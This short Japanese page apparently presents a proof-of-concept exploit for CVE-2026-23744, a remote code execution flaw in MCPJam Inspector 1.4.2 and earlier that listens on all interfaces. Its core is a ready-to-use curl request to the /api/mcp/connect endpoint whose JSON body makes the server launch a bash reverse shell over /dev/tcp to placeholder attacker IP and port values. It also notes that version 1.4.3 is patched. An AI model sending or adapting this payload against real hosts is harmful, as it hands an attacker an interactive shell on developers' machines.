
CVE-2026-23744の概念実証エクスプロイト。MCPJam Inspectorのリモートコード実行脆弱性。リバースシェルペイロードを含む細工されたHTTPリクエストを/api/mcp/connectエンドポイントに送信することでRCEを実証します。
MCP Server の脆弱性に関する PoC。
適切な本文を持つ投稿部分を自動化しました。
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector は、MCP サーバー向けの最初のローカル開発プラットフォームです。バージョン 1.4.2 以前はリモートコード実行 (RCE) の脆弱性の影響を受けます。この脆弱性により、攻撃者は細工した HTTP リクエストを送信して MCP サーバーのインストールをトリガーし、RCE を引き起こすことができます。MCPJam Inspector はデフォルトで 127.0.0.1 ではなく 0.0.0.0 でリッスンするため、攻撃者は単純な HTTP リクエストでリモートから RCE を引き起こすことができます。バージョン 1.4.3 にはパッチが含まれています。